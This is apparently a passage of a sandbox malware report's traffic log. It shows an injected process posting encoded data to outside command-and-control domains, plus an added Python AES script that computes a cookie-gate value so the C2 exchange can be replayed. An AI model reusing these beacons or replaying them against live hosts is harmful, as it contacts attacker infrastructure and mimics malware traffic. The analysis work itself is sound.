                                                                Data Raw: 36 64 72 3d 6c 43 4f 75 5a 30 70 64 4d 4e 79 74 59 32 35 61 43 76 2b 66 4b 6c 42 4d 6a 6d 64 6d 6e 57 69 71 48 54 4a 74 42 75 2f 45 58 7a 4a 63 6e 43 67 59 74 6b 4f 68 54 58 63 46 48 6d 71 56 64 6b 4a 76 74 50 2b 34 4e 47 66 73 69 50 67 67 35 65 68 34 6a 76 31 4a 65 38 6e 6e 6d 4a 71 62 42 7a 38 49 37 75 43 6b 68 6d 68 79 37 49 51 6e 64 36 6c 44 55 6c 70 7a 45 74 51 34 44 51 4e 31 6b 59 7a 6e 38 4b 62 73 6b 69 73 4f 57 47 71 41 7a 4c 71 37 6e 4f 41 47 4b 35 45 68 54 4f 57 68 2b 6d 4d 32 67 61 5a 68 59 6e 66 5a 6e 6f 42 4d 37 36 62 74 2b 6b 6f 71 4d 30 34 36 4a 67 5a 66 4c 4e 4b 64 4a 68 45 63 50 59 51 64 4d 6a 55 4c 64 78 69 2f 4f 62 4f 42 50 71 38 48 34 6d 6f 46 4d 64 76 47 2f 58 66 77 37 47 78 4f 4b 4f 6e 4c 34 34 54 66 79 7a 30 4f 32 46 75 46 39 46 49 33 6f 4f 62 4e 76 57 30 45 4d 68 74 49 2f 6b 30 59 76 55 2f 75 73 70 78 4b 66 38 7a 6b 75 33 78 5a 30 48 4c 37 63 47 4b 42 42 4f 43 67 50 67 45 52 4a 30 31 48 34 70 31 50 6f 68 72 35 44 50 69 63 30 35 57 6d 53 34 4d 6c 69 45 31 50 55 52 62 4e 77 4c [TRUNCATED]
                                                                Data Ascii: 6dr=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 [TRUNCATED]
                                                                Nov 27, 2024 08:55:15.609050035 CET | 686 | IN | HTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Wed, 27 Nov 2024 07:55:15 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                Cache-Control: no-cache
                                                                Content-Encoding: br
                                                                Data Raw: 31 62 63 0d 0a a1 f0 19 00 20 ff af a9 a7 2b 8f 2e 79 b2 1c 1f 25 06 bb f6 a9 b9 75 a2 90 bd 3b 70 4e d4 89 4e 35 b2 c1 37 4b 4e 1c f0 84 cb a3 6e 76 b0 83 de e6 9a 3d fb 13 a4 1e 1c 73 6b 04 d2 25 81 29 3b 3d d4 2a 05 f0 93 8a f6 0c 93 c2 fa 05 ef 2f 30 2a 9b e2 c6 4c f9 72 2e 65 39 c1 c8 59 04 0e e0 94 37 9f df 85 f3 43 46 04 9c 13 d1 a1 46 90 2a e3 dd 81 c3 92 76 34 52 84 fc 43 dc f7 ff 53 24 9e fc 36 20 07 b8 56 9c f9 fc a6 ce 44 c6 ec 1a 4d eb fa f9 b9 14 8a fe d2 df d3 bf 98 cc 8d b9 9e cf ed ee 52 87 6f 08 e6 a9 37 18 d3 b6 91 45 bb e9 de b7 bd 68 87 21 f1 a1 09 22 55 ba cf f6 f7 25 96 b8 81 31 09 2f 8e 13 68 10 44 6a d9 65 6f 48 e4 7f bd 3d 6b 00 fa 0f dc 56 00 95 d5 4e 6a 1b 45 b1 4b b5 ca 6b 95 40 a6 5d 05 5a 56 29 26 b4 b2 79 ad f3 24 4d eb d8 7b 9f ab 3a d1 3a cd b5 04 1d 43 0e 55 aa db b9 1c a0 fa 71 3b 73 b9 d2 10 a5 69 15 43 94 82 4e 41 b7 1d 24 d2 81 ca 64 1a 8d b8 70 93 7a db e8 09 60 ca e0 df df a5 5f 2c 0d 0e 91 86 08 76 fe fa fe 83 3b 5f cf 77 d3 65 50 d3 98 5a 5a 11 12 e2 02 45 [TRUNCATED]
                                                                Data Ascii: (brotli-compressed chunk of 0x1bc bytes; not printable as text, see Data Raw above)


                                                                Session ID: 16 | Source IP: 192.168.2.6 | Source Port: 50003 | Destination IP: 185.27.134.144 | Destination Port: 80 | PID: 4872 | Process: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Nov 27, 2024 08:55:16.996102095 CET | 497 | OUT | GET /d9ku/?6dr=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94J8e6gZfcDjEsysW5sV4r35t/PcxyDEU8Ed58PWAzm7Gn7pjmnX0=&Kp=6N8LUn6pGPW HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-US
                                                                Host: www.amayavp.xyz
                                                                Connection: close
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Nov 27, 2024 08:55:18.327203989 CET | 1188 | IN | HTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Wed, 27 Nov 2024 07:55:18 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 987
                                                                Connection: close
                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                Cache-Control: no-cache
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 65 73 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 74 6f 4e 75 6d 62 65 72 73 28 64 29 7b 76 61 72 20 65 3d 5b 5d 3b 64 2e 72 65 70 6c 61 63 65 28 2f 28 2e 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 65 2e 70 75 73 68 28 70 61 72 73 65 49 6e 74 28 64 2c 31 36 29 29 7d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 74 6f 48 65 78 28 29 7b 66 6f 72 28 76 61 72 20 64 3d 5b 5d 2c 64 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 41 72 72 61 79 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 61 72 67 75 6d 65 6e 74 73 2c 65 3d 22 22 2c 66 3d 30 3b 66 3c 64 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 65 2b 3d 28 31 36 3e 64 5b 66 5d 3f 22 30 22 3a 22 22 29 2b 64 5b 66 5d 2e 74 6f 53 74 72 69 6e 67 28 31 36 [TRUNCATED]
                                                                Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("f7d8695144b251459459fd530d567041");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.amayavp.xyz/d9ku/?6dr=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94J8e6gZfcDjEsysW5sV4r35t/PcxyDEU8Ed58PWAzm7Gn7pjmnX0=&Kp=6N8LUn6pGPW&i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>
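The response above is not C2 content: it is a JavaScript cookie gate served in front of the host. The page loads /aes.js, decrypts the constant c with key a and IV b (in slowAES, mode 2 is CBC), stores the hex of the result in a `__test` cookie and reloads the same URL with `&i=1`. The injected process does not run JavaScript, so the exchange stops here in the sandbox. The script below is an added example, not code from the report or the sample; it reproduces that browser-side computation in pure Python (no crypto library) so a replay harness can present the cookie. It assumes the served aes.js returns the raw 16 decrypted bytes; if that build strips PKCS#7 padding the resulting cookie may be shorter than 32 hex characters. The key, IV and ciphertext are the values a, b and c from the response body; the cookie value itself is not shown anywhere in the report, so the printed result is computed, not captured.

```python
# Pure-Python AES-128-CBC decryption, enough to reproduce the browser-side
# computation in the session 16 response without pulling in a crypto library.
# Added example; the S-box is derived from its definition rather than typed in.

def _xtime(a):
    """Multiply by x in GF(2^8) with the AES polynomial 0x11b."""
    a <<= 1
    return (a ^ 0x11B) & 0xFF if a & 0x100 else a


def _gmul(a, b):
    """Multiply two GF(2^8) elements."""
    r = 0
    while b:
        if b & 1:
            r ^= a
        a = _xtime(a)
        b >>= 1
    return r


def _build_sbox():
    """Derive the S-box from its definition (GF(2^8) inverse + affine map)."""
    sbox = [0] * 256
    for x in range(256):
        inv = next((y for y in range(256) if _gmul(x, y) == 1), 0)
        s, rot = inv, inv
        for _ in range(4):                     # s = inv ^ rotl1 ^ rotl2 ^ rotl3 ^ rotl4
            rot = ((rot << 1) | (rot >> 7)) & 0xFF
            s ^= rot
        sbox[x] = s ^ 0x63
    return sbox


SBOX = _build_sbox()
INV_SBOX = [0] * 256
for _i, _v in enumerate(SBOX):
    INV_SBOX[_v] = _i


def _expand_key(key):
    """AES-128 key schedule: 11 round keys of 16 bytes, column-major like the state."""
    w = [list(key[4 * i:4 * i + 4]) for i in range(4)]
    rcon = 1
    for i in range(4, 44):
        t = list(w[i - 1])
        if i % 4 == 0:
            t = [SBOX[b] for b in t[1:] + t[:1]]   # RotWord, then SubWord
            t[0] ^= rcon
            rcon = _xtime(rcon)
        w.append([w[i - 4][j] ^ t[j] for j in range(4)])
    return [sum(w[4 * r:4 * r + 4], []) for r in range(11)]


def _inv_mix_columns(s):
    out = []
    for c in range(4):
        a0, a1, a2, a3 = s[4 * c:4 * c + 4]
        out += [
            _gmul(a0, 14) ^ _gmul(a1, 11) ^ _gmul(a2, 13) ^ _gmul(a3, 9),
            _gmul(a0, 9) ^ _gmul(a1, 14) ^ _gmul(a2, 11) ^ _gmul(a3, 13),
            _gmul(a0, 13) ^ _gmul(a1, 9) ^ _gmul(a2, 14) ^ _gmul(a3, 11),
            _gmul(a0, 11) ^ _gmul(a1, 13) ^ _gmul(a2, 9) ^ _gmul(a3, 14),
        ]
    return out


def _decrypt_block(round_keys, block):
    """FIPS-197 inverse cipher on one 16-byte block (state index = row + 4*col)."""
    s = [b ^ k for b, k in zip(block, round_keys[10])]
    for rnd in range(9, -1, -1):
        s = [s[r + 4 * ((c - r) % 4)] for c in range(4) for r in range(4)]  # InvShiftRows
        s = [INV_SBOX[b] for b in s]                                         # InvSubBytes
        s = [b ^ k for b, k in zip(s, round_keys[rnd])]                      # AddRoundKey
        if rnd:
            s = _inv_mix_columns(s)
    return bytes(s)


def aes_cbc_decrypt(key, iv, data):
    """CBC decryption; returns raw bytes, no padding removal (see lead-in)."""
    round_keys = _expand_key(key)
    out, prev = bytearray(), iv
    for i in range(0, len(data), 16):
        block = data[i:i + 16]
        out += bytes(p ^ q for p, q in zip(_decrypt_block(round_keys, block), prev))
        prev = block
    return bytes(out)


def challenge_cookie(key_hex, iv_hex, ct_hex):
    """What toHex(slowAES.decrypt(c, 2, a, b)) evaluates to in the served page."""
    return aes_cbc_decrypt(bytes.fromhex(key_hex), bytes.fromhex(iv_hex),
                           bytes.fromhex(ct_hex)).hex()


# Values a, b and c copied from the session 16 response body.
CHALLENGE_KEY = "f655ba9d09a112d4968c63579db590b4"
CHALLENGE_IV = "98344c2eee86c3994890592585b49f80"
CHALLENGE_CT = "f7d8695144b251459459fd530d567041"

if __name__ == "__main__":
    print("__test=" + challenge_cookie(CHALLENGE_KEY, CHALLENGE_IV, CHALLENGE_CT))
```

To replay the exchange, send the cookie with the follow-up GET that the script's `location.href` builds (the original query string plus `&i=1`). Note that the gate only proves a client can run JavaScript; it says nothing about the C2 protocol itself, whose POST bodies remain opaque here.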


                                                                Session ID: 17 | Source IP: 192.168.2.6 | Source Port: 50006 | Destination IP: 172.67.145.234 | Destination Port: 80 | PID: 4872 | Process: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Nov 27, 2024 08:55:24.187865973 CET | 746 | OUT | POST /vg0z/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.vayui.top
                                                                Origin: http://www.vayui.top
                                                                Referer: http://www.vayui.top/vg0z/
                                                                Cache-Control: no-cache
                                                                Content-Length: 208
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 32 37 47 45 30 57 34 36 48 49 4c 61 57 71 56 57 64 4e 35 42 6a 6a 4b 4f 39 47 43 38 73 4d 57 78 4d 39 69 44 32 34 50 5a 2f 53 43 30 51 43 58 38 57 6b 6a 58 38 43 72 30 72 4c 50 41 41 44 70 47 6e 57 6b 65 7a 56 4d 4b 39 39 64 7a 37 32 56 5a 30 32 64 6b 51 61 43 4b 33 72 34 61 56 6a 59 70 73 69 4f 37 55 67 6a 6c 56 6f 69 62 46 34 7a 55 65 2b 61 39 76 77 59 48 6a 52 4f 6c 75 35 41 67 5a 75 77 4b 66 4f 41 43 45 5a 61 76 37 65 51 51 2f 50 66 61 58 4c 4a 37 36 69 43 2b 54 33 42 44 56 33 62 79 4f 36 79 71 2b 43 5a 48 7a 65 58 5a 79 33 31 77 4d 4a 67 6b 45 68 41 44 58 6b 43 6c 72 5a 4a 43 4a 72 4e 37 37 71 34 30
                                                                Data Ascii: 6dr=27GE0W46HILaWqVWdN5BjjKO9GC8sMWxM9iD24PZ/SC0QCX8WkjX8Cr0rLPAADpGnWkezVMK99dz72VZ02dkQaCK3r4aVjYpsiO7UgjlVoibF4zUe+a9vwYHjROlu5AgZuwKfOACEZav7eQQ/PfaXLJ76iC+T3BDV3byO6yq+CZHzeXZy31wMJgkEhADXkClrZJCJrN77q40
                                                                Nov 27, 2024 08:55:25.328429937 CET | 910 | IN | HTTP/1.1 404 Not Found
                                                                Date: Wed, 27 Nov 2024 07:55:25 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uNuHMovBEZ%2Bn4NWml1LVp5qOBo5m8swT6H3kMl8%2BA4ZcgInj26eny%2FXEWCtRl0%2BbSaaqMYKUrjZ1rI%2FPCvibsl5teb9X6HHENPrIwx3lttsuN2YUZugFJKT1v0krYDwr"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8e908e497dec4388-EWR
                                                                Content-Encoding: gzip
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1638&min_rtt=1638&rtt_var=819&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=746&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: (one 0x6d-byte chunk holding a gzip-compressed body; not printable as text. The gzip trailer ends in 92 00 00 00, an uncompressed length of 0x92 = 146 bytes, the same length as the plain nginx "404 Not Found" page returned in session 20)


                                                                Session ID: 18 | Source IP: 192.168.2.6 | Source Port: 50007 | Destination IP: 172.67.145.234 | Destination Port: 80 | PID: 4872 | Process: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Nov 27, 2024 08:55:26.934150934 CET | 770 | OUT | POST /vg0z/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.vayui.top
                                                                Origin: http://www.vayui.top
                                                                Referer: http://www.vayui.top/vg0z/
                                                                Cache-Control: no-cache
                                                                Content-Length: 232
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 32 37 47 45 30 57 34 36 48 49 4c 61 57 4b 46 57 66 71 56 42 72 6a 4b 52 68 57 43 38 69 73 58 5a 4d 39 75 44 32 39 76 4a 2f 68 6d 30 51 6d 62 38 59 46 6a 58 31 53 72 30 6b 72 50 59 4f 6a 70 50 6e 57 59 38 7a 58 49 4b 39 35 4e 7a 37 30 4e 5a 30 6e 64 6c 53 4b 43 45 73 62 34 63 62 44 59 70 73 69 4f 37 55 6b 4b 74 56 70 4b 62 46 49 44 55 65 66 61 2b 77 41 59 47 69 52 4f 6c 2f 70 41 6b 5a 75 78 5a 66 4b 42 6e 45 62 69 76 37 61 63 51 2b 64 33 5a 65 4c 4a 35 35 53 44 39 44 55 30 6d 62 32 43 65 43 38 36 38 76 79 6c 73 37 49 4b 44 75 45 31 54 65 5a 41 6d 45 6a 59 78 58 45 43 50 70 5a 78 43 62 38 42 63 30 65 64 58 6d 42 4a 4f 6f 53 46 32 78 4b 50 72 7a 30 55 6c 79 48 6b 71 46 51 3d 3d
                                                                Data Ascii: 6dr=27GE0W46HILaWKFWfqVBrjKRhWC8isXZM9uD29vJ/hm0Qmb8YFjX1Sr0krPYOjpPnWY8zXIK95Nz70NZ0ndlSKCEsb4cbDYpsiO7UkKtVpKbFIDUefa+wAYGiROl/pAkZuxZfKBnEbiv7acQ+d3ZeLJ55SD9DU0mb2CeC868vyls7IKDuE1TeZAmEjYxXECPpZxCb8Bc0edXmBJOoSF2xKPrz0UlyHkqFQ==
                                                                Nov 27, 2024 08:55:28.174063921 CET | 893 | IN | HTTP/1.1 404 Not Found
                                                                Date: Wed, 27 Nov 2024 07:55:28 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NoxhpH51T1yxFOujIFCghAtMu40ZpYJulPcksZgpzYC27g0QtQa91iDPgFY9rXCeVtvVjr07y3SYmFTqniHeE%2BteVMzsxWDv1%2F%2BqTs70%2BAtlyVrK10yIYHKZe3B3o04p"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8e908e5b38e443a7-EWR
                                                                Content-Encoding: gzip
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2033&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=770&delivery_rate=0&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a 36 33 0d 0a b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: (two chunks, 0xf and 0x63 bytes, holding a gzip-compressed body; not printable as text. The gzip trailer ends in 92 00 00 00, an uncompressed length of 0x92 = 146 bytes, the same length as the plain nginx "404 Not Found" page returned in session 20)


                                                                Session ID: 19 | Source IP: 192.168.2.6 | Source Port: 50008 | Destination IP: 172.67.145.234 | Destination Port: 80 | PID: 4872 | Process: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Nov 27, 2024 08:55:29.599221945 CET | 1783 | OUT | POST /vg0z/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.vayui.top
                                                                Origin: http://www.vayui.top
                                                                Referer: http://www.vayui.top/vg0z/
                                                                Cache-Control: no-cache
                                                                Content-Length: 1244
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 32 37 47 45 30 57 34 36 48 49 4c 61 57 4b 46 57 66 71 56 42 72 6a 4b 52 68 57 43 38 69 73 58 5a 4d 39 75 44 32 39 76 4a 2f 68 75 30 51 56 54 38 59 6e 4c 58 6e 43 72 30 74 4c 50 62 4f 6a 6f 50 6e 57 77 34 7a 58 55 38 39 37 46 7a 70 48 46 5a 6a 6b 46 6c 62 4b 43 45 6b 37 34 5a 56 6a 5a 74 73 69 65 2f 55 67 75 74 56 70 4b 62 46 4b 4c 55 4a 65 61 2b 79 41 59 48 6a 52 4f 78 75 35 41 63 5a 71 6c 4a 66 4b 55 53 59 34 71 76 36 2b 77 51 7a 4f 66 5a 43 62 4a 42 77 43 44 66 44 55 6f 31 62 32 75 73 43 38 6d 57 76 31 4e 73 74 74 6a 5a 31 6c 77 4a 43 6f 55 57 51 79 59 68 66 43 71 66 6e 37 74 76 53 65 52 44 31 39 52 41 67 48 4a 35 71 6a 4d 79 32 37 62 61 33 46 56 48 36 55 52 64 54 79 56 44 55 34 68 75 71 4c 71 70 41 5a 4f 61 48 4b 49 55 46 39 51 46 2f 68 6d 66 50 4e 70 70 2f 36 46 66 2b 57 57 36 51 39 38 31 4d 73 32 79 6b 65 63 50 73 6f 2b 67 6a 78 65 43 56 6b 70 2b 66 68 64 42 78 64 31 6f 6c 4a 35 52 33 30 44 32 47 31 6c 39 44 55 39 33 4b 6b 59 34 37 74 37 47 36 69 69 42 38 76 5a 61 75 69 64 57 33 43 [TRUNCATED]
                                                                Data Ascii: 6dr=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 [TRUNCATED]
                                                                Nov 27, 2024 08:55:30.869734049 CET | 905 | IN | HTTP/1.1 404 Not Found
                                                                Date: Wed, 27 Nov 2024 07:55:30 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fCc2KcmjLsV8PRD2ugtrUvOmlYgXI12iciS4Dsakf1T0Vz61GK8J5F9MwViNSx45p6RJi9hUCQDooJtqGRVoBstbVXME8ADSHLJ%2FIjFWLGcGNaTLsOiqopq4S5%2BtyyF0"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8e908e6bfb8c8cc0-EWR
                                                                Content-Encoding: gzip
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1783&min_rtt=1783&rtt_var=891&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1783&delivery_rate=0&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: (one 0x6d-byte chunk holding a gzip-compressed body; not printable as text. The gzip trailer ends in 92 00 00 00, an uncompressed length of 0x92 = 146 bytes, the same length as the plain nginx "404 Not Found" page returned in session 20)


                                                                Session ID: 20 | Source IP: 192.168.2.6 | Source Port: 50009 | Destination IP: 172.67.145.234 | Destination Port: 80 | PID: 4872 | Process: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Nov 27, 2024 08:55:32.265881062 CET | 495 | OUT | GET /vg0z/?6dr=75uk3ictCfC5d95jc9ErhxuZnXjbt/7lQbKW3bXizAnaAV7ibEnK2RjZpZGGD2cxunkBvA8A/q4ys0sLjHkTFrWSncccbEBJ6T2ZUmHvVL3BVpynffLQ4AgBix/2srBcYLhAIes=&Kp=6N8LUn6pGPW HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-US
                                                                Host: www.vayui.top
                                                                Connection: close
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Nov 27, 2024 08:55:33.460850954 CET | 894 | IN | HTTP/1.1 404 Not Found
                                                                Date: Wed, 27 Nov 2024 07:55:33 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zsSNk94fbpZn0%2FKtIyaVjlxRad66c1nRYsDOZ9VViVYiLjz%2F8mE3SXCK3j3%2FrX0kxLEJAhhz6SkWaDMUQfEEr7myJC9sj7PScMglQpYTHQ4mD8Kv69j3nKjSiddomww7"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8e908e7caeb34386-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1573&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=495&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


